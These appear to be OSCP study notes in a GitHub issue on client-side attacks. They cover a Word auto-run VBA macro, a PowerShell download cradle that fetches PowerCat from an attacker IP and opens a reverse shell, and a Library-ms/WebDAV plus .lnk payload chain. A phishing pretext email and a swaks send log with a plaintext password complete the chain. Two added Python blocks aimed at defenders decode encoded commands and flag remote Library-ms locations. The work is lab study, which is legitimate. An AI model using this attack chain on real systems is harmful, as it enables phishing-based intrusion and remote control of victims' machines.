WDavid404 / OSCP


11. Client-side Attacks #12

Open WDavid404 opened 9 months ago

WDavid404 commented 9 months ago

Target Reconnaissance

Information Gathering

exiftool

Used for reading and writing metadata in a variety of file types.

exiftool a.jpg # A basic command to extract all metadata from a file named a.jpg.
exiftool -a -u brochure.pdf
# argument -a displays duplicated tags and -u displays unknown tags, followed by the filename brochure.pdf

The output further reveals that the PDF was created with Microsoft PowerPoint for Microsoft 365. This is crucial information for us to plan our client-side attack since we now know that the target uses Microsoft Office and since there is no mention of "macOS" or "for Mac" in any of the metadata tags, it's very probable that Windows was used to create this document.

Gobuster to search pdf files on a target web site

gobuster dir -u 192.168.194.197 -w /usr/share/wordlists/dirb/common.txt -t 5 -x .pdf

Client Fingerprinting

Client fingerprinting, also known as device fingerprinting, is used to obtain operating system and browser information from a target.

theHarvester

https://qiita.com/kichise/items/13d99dcb6e3e4819e0a8
An OSINT (open source intelligence) tool. Given a domain name, it finds the hosts, email addresses, names, subdomains, IPs, URLs and so on associated with it.

./theHarvester.py -d apple.com -b yahoo

Canarytokens

A free web service that generates a link with an embedded token that we'll send to the target. When the target opens the link in a browser, we will get information about their browser, IP address, and operating system.

A canary token sends an alert to its operator when it detects external access to itself. Tokens can be files, URLs (a unique identifier embedded in a URL), Web APIs, and so on. By placing a canary token disguised as an important file inside the target system, or by deploying a URL that is normally never accessed as a canary token, administrators can detect suspicious access from outside. They can also be placed in Git repositories and CI/CD pipelines.

Some attackers have abused canary token services in their malware and ransomware operations. In the ransomware case, the operator embeds a token in the program so that they can quickly learn that the victim's system has been encrypted and also obtain the decryption key information.

Webpage: https://canarytokens.org/generate

A map on the left side shows us the geographical location of the victim. We can click on the entry to get more information.

WDavid404 commented 9 months ago

Exploiting Microsoft Office

Preparing the Attack

In a majority of situations we can't just send the malicious document as an attachment. Furthermore, most anti-phishing training programs stress the danger of enabling macros in an emailed Office document.

To deliver our payload and increase the chances that the target opens the document, we could use a pretext and provide the document in another way, like a download link.

If we successfully manage to deliver the Office document to our target via email or download link, the file will be tagged with the Mark of the Web (MOTW).

A user opens an Office file containing macros obtained from the internet. For example, an email attachment. The file has Mark of the Web (MOTW). Mark of the Web only applies to files saved on an NTFS file system, not files saved to FAT32 formatted devices.

Windows uses the Mark-of-the-Web (MotW) to indicate that a file originated from the Internet, which gives Microsoft Defender SmartScreen an opportunity to perform additional inspection of the content. MotW also supplies the basis for prompting a user with an additional prompt when high-risk extensions are opened.

Office documents tagged with MOTW will open in Protected View, which disables all editing and modification settings in the document and blocks the execution of macros or embedded objects. When the victim opens the MOTW-tagged document, Office will show a warning with the option to Enable Editing.

Leveraging Microsoft Word Macros

Step 1: we created a VBA macro in a Word document to execute a single command when the document is opened.
Step 2: we replaced the single command with a base64-encoded PowerShell command downloading PowerCat and starting a reverse shell on the local system.

Let's dive in and create a macro in Word. We'll create a blank Word document with mymacro as the file name and save it in the .doc format. This is important because the newer .docx file type cannot save macros without attaching a containing template. This means that we can run macros within .docx files but we can't embed or save the macro in the document.

Ref: VBA code example: launch PowerShell when the .doc file is opened

Sub AutoOpen()
  ' Entry point used by older Word versions when the document opens
  MyMacro
End Sub

Sub Document_Open()
  ' Document event fired when the document opens
  MyMacro
End Sub

Sub MyMacro()
  ' Start PowerShell through the Windows Script Host shell object
  CreateObject("Wscript.Shell").Run "powershell"
End Sub

Note: VBA has a 255-character limit for literal strings and therefore, we can't just embed the base64-encoded PowerShell commands as a single string. This restriction does not apply to strings stored in variables, so we can split the commands into multiple lines (stored in strings) and concatenate them.

【Lesson】 The macro must be saved inside the current file, and make sure the macro is enabled.


PowerShell command string

PowerShell download cradle and PowerCat reverse shell:

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

We need to base64-encode the command string above: https://www.base64encode.org/ Note: use 'UTF-16LE'.


Split a base64-encoded PowerShell command string

Python script to split a base64-encoded PowerShell command string into chunks short enough for VBA string literals:

# The full "powershell.exe -nop -w hidden -e <base64>" command (truncated here)
cmd = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwA..."

n = 50  # chunk size, well below VBA's 255-character literal limit

# Print one 'Str = Str + "..."' line per chunk so the pieces can be pasted into the macro
for i in range(0, len(cmd), n):
    print('Str = Str + "' + cmd[i:i+n] + '"')

powercat

A PowerShell TCP/IP swiss army knife that works with Netcat & Ncat
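As an added example (not part of these notes), here is the defender's side of the encoded command described above: a small Python triage helper that decodes a `-e` base64/UTF-16LE payload found in a logged process command line and flags the download-cradle and PowerCat indicators. The sample command line and the 192.0.2.10 address are constructed for this example.

```python
import base64
import re
from typing import Optional

# Indicators drawn from the payload described in these notes: a download
# cradle that fetches powercat and opens a reverse shell, run hidden and
# without a profile.
INDICATORS = [
    r"\bIEX\b|Invoke-Expression",
    r"New-Object\s+(System\.)?Net\.WebClient",
    r"\.DownloadString\(",
    r"\bpowercat\b",
    r"-nop\b|-NoProfile\b",
    r"-w\s+hidden|-WindowStyle\s+Hidden",
]

# powershell.exe accepts -e, -ec, -enc or -EncodedCommand followed by base64.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> dict:
    """Check the raw command line plus the decoded payload against INDICATORS."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    hits = [p for p in INDICATORS if re.search(p, haystack, re.I)]
    return {"decoded": decoded, "indicators": hits, "suspicious": len(hits) >= 2}


# Constructed sample of what the notes' macro payload looks like in a
# process-creation log (192.0.2.10 is a documentation address, not a real host).
SAMPLE_PAYLOAD = ("IEX(New-Object System.Net.WebClient).DownloadString("
                  "'http://192.0.2.10/powercat.ps1');powercat -c 192.0.2.10 -p 4444 -e powershell")
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -e " + base64.b64encode(
    SAMPLE_PAYLOAD.encode("utf-16le")).decode("ascii")

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```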

WDavid404 commented 9 months ago

Abusing Windows Library Files

Obtaining Code Execution via Windows Library Files

Windows library files are virtual containers for user content. They connect users with data stored in remote locations like web services or shares. These files have a .Library-ms file extension and can be executed by double-clicking them in Windows Explorer.

We will have two stages: In the first stage, we'll use Windows library files to gain a foothold on the target system and set up the second stage. In the second stage, we'll use the foothold to provide an executable file that will start a reverse shell when double-clicked.

we'll create a Windows library file connecting to a WebDAV share we'll set up. In the first stage, the victim receives a .Library-ms file, perhaps via email. When they double-click the file, it will appear as a regular directory in Windows Explorer. In the WebDAV directory, we'll provide a payload in the form of a .lnk shortcut file for the second stage to execute a PowerShell reverse shell. We must convince the user to double-click our .lnk payload file to execute it.

Use the WsgiDAV tool as the WebDAV server to host and serve our files

kali@kali:~$ pip3 install wsgidav           
Defaulting to user installation because normal site-packages is not writeable
Collecting wsgidav
  Downloading WsgiDAV-4.0.1-py3-none-any.whl (171 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 171.3/171.3 KB 1.6 MB/s eta 0:00:00
...  
Successfully installed json5-0.9.6 wsgidav-4.0.1 

Once WsgiDAV is installed, we'll create the /home/kali/webdav directory to use as the WebDAV share that will contain our .lnk file. For now, let's place a test.txt file in this directory.

kali@kali:~$ mkdir /home/kali/webdav
kali@kali:~$ touch /home/kali/webdav/test.txt
kali@kali:~$ /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

On a Windows PC, create a "config.Library-ms" file:

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>http://192.168.45.159</url>  <!-- ==> our Kali IP -->
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>

(Note: Windows may change the URL automatically, so we should reset the contents of the file to the above.)

The file above is the Windows Library code for connecting to our WebDAV share ==> double-clicking this config.Library-ms file opens Kali's WebDAV folder, so files on Windows can be shared with Kali.

Create the shortcut file: The goal is to start a reverse shell by putting the .lnk shortcut file on the WebDAV share for the victim to execute.

  1. Right-click on the desktop and click on New, then on Shortcut.
  2. Enter the command below into the input field and click Next.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.159:8000/powercat.ps1');powercat -c 192.168.45.159 -p 4444 -e powershell"

--> i.e., it downloads a powercat.ps1 file from Kali's port 8000 and, by executing it, sends a reverse shell to Kali's port 4444.

The shortcut dialog looks like this:

Next, we'll provide the Windows library file we created to a simulated victim with a pretext. Our goal is to convince the victim to double-click the shortcut after embedding the WebDAV share via the prepared Windows library file.

Reason: why not use the .lnk file directly? Because a .lnk file from a local PC is easily recognized by spam filters. However, a majority of spam filters and security technologies will pass Windows library files directly to the user. When they double-click the file, Windows Explorer displays the contents of the remote location as if it were a local directory.

On the Kali side, send a phishing email to marcus@beyond.com

  1. Prepare a powercat.ps1 file and start an HTTP server so the target can download it

kali@kali:~/beyond$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

kali@kali:~/beyond$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

  2. nc -nvlp 4444
  3. Prepare the email body (body.txt)

Hey! I checked WEBSRV1 and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons.

On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks!

John


  4. Send the email; the exact command is as follows (add -ap to enable password authentication):

kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.45.159 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
Username: john
Password: dqsTwTpZPn#nL
=== Trying 192.168.50.242:25...
=== Connected to 192.168.50.242.
<-  220 MAILSRV1 ESMTP
 -> EHLO kali
<-  250-MAILSRV1
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> AUTH LOGIN
<-  334 VXNlcm5hbWU6
 -> am9obg==
<-  334 UGFzc3dvcmQ6
 -> ZHFzVHdUcFpQbiNuTA==
<-  235 authenticated.
 -> MAIL FROM:john@beyond.com
<-  250 OK
 -> RCPT TO:marcus@beyond.com
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> 36 lines sent
<-  250 Queued (1.088 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.
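An added example, not from these notes or the course material, showing how a mail gateway or analyst would triage a .Library-ms attachment like the config.Library-ms above: parse the library XML and flag every search-connector location that points at a remote host rather than a local folder. The sample file and the webdav.example.invalid host are constructed for this example.

```python
import xml.etree.ElementTree as ET
from typing import List
from urllib.parse import urlparse

# Namespace used by Windows library description files (seen in the file above).
NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample mirroring the structure of the notes' config.Library-ms,
# with one remote (WebDAV) location and one harmless local folder.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@windows.storage.dll,-34582</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>http://webdav.example.invalid</url></simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation><url>C:\\Users\\Public\\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def library_locations(xml_text: str) -> List[str]:
    """Return every <url> found inside a <simpleLocation> of the library file."""
    root = ET.fromstring(xml_text)
    urls = root.findall(".//lib:simpleLocation/lib:url", NS)
    return [u.text.strip() for u in urls if u.text]


def is_remote_location(location: str) -> bool:
    """True when Explorer would fetch the folder listing from another host."""
    if location.startswith("\\\\"):  # UNC path (\\server\share)
        return True
    return urlparse(location).scheme.lower() in {"http", "https"}  # WebDAV over HTTP(S)


def triage_library_file(xml_text: str) -> dict:
    """Summarise all locations and the remote ones that warrant blocking the file."""
    locations = library_locations(xml_text)
    remote = [loc for loc in locations if is_remote_location(loc)]
    return {"locations": locations, "remote": remote, "block": bool(remote)}


if __name__ == "__main__":
    print(triage_library_file(SAMPLE_LIBRARY_MS))
```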

WDavid404 commented 9 months ago

11.3.1 Capstone practice

  1. gobuster dir -u 192.168.194.197 -w /usr/share/wordlists/dirb/common.txt -t 5 -x .pdf,txt
  2. Download the PDF file and use exiftool to find the author information (dave wizard)
  3. Send an email to the author: sudo swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com -ap --attach config.Library-ms --server 192.168.208.199 --body body.txt --header "Subject: Problems" --suppress-data